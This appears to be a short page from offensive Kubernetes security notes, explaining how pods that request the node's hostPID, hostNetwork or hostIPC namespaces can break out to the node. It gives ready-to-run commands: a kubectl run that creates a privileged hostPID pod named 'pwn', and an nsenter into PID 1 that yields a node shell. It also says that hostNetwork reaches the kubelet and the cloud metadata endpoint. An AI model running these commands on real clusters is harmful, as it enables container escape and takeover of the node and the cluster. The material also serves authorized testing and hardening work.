A pod can request the node's namespaces with hostPID, hostNetwork, or hostIPC. hostPID exposes every node process for nsenter or injection; hostNetwork puts the pod on the node's interfaces, reaching the kubelet and metadata service; hostIPC exposes node shared memory.
# A pod with hostPID can enter node process namespaces
kubectl run pwn --image=alpine --overrides='{"spec":{"hostPID":true,"containers":[{"name":"c","image":"alpine","securityContext":{"privileged":true},"command":["sleep","1d"]}]}}'
kubectl exec -it pwn -- nsenter --target 1 --mount --pid -- sh
Exploitation notes#
- The breakout is the generic Shared host namespaces; the pod spec requests the sharing.
hostNetworkalone reaches the kubelet and the cloud metadata endpoint even when the pod network blocks them, see Cloud metadata from pod.hostPIDwith nsenter needs the privileged orCAP_SYS_ADMINcontext to enter the mount namespace.